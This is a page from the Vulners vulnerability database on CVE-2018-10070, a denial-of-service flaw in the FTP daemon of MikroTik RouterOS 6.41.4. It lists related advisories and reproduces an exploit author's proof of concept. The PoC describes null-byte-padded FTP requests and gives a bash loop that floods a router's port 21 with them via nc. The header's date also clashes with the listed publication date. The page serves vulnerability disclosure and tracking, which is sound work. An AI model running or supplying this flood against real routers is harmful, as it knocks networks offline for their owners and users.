| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| MikroTik 6.41.4 - FTP daemon Denial of Service PoC | 13 Apr 201800:00 | – | zdt | |
| MikroTik FTP Daemon Denial of Service Vulnerability | 18 Apr 201800:00 | – | cnvd | |
| CVE-2018-10070 | 16 Apr 201821:00 | – | cve | |
| CVE-2018-10070 | 16 Apr 201821:00 | – | cvelist | |
| MikroTik 6.41.4 - FTP daemon Denial of Service PoC | 13 Apr 201800:00 | – | exploitpack | |
| CVE-2018-10070 | 16 Apr 201821:29 | – | nvd | |
| MikroTik RouterOS 6.41.4 DoS Vulnerability | 19 Apr 201800:00 | – | openvas | |
| MikroTik 6.41.4 Denial Of Service | 13 Apr 201800:00 | – | packetstorm | |
| Design/Logic Flaw | 16 Apr 201821:29 | – | prion |
################
#Title: MikroTik 6.41.4 Denial of service FTP daemon crash
#CVE: CVE-2018-10070
#CWE: CWE-400
#Exploit Author: Hosein Askari (FarazPajohan)
#Vendor HomePage: https://mikrotik.com/
#Version : 6.41.4 (Released 2018-Apr-05) | All Version
#Date: 13-05-2018
#Category: Network Appliance
#Description: A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begins with many '\0' characters, #preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.
#POC: https://vimeo.com/264461602
################
for i in `seq 1 100`
do
cat craft | nc -nv <MikroTik IP> 21 &
sleep 2
doneData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation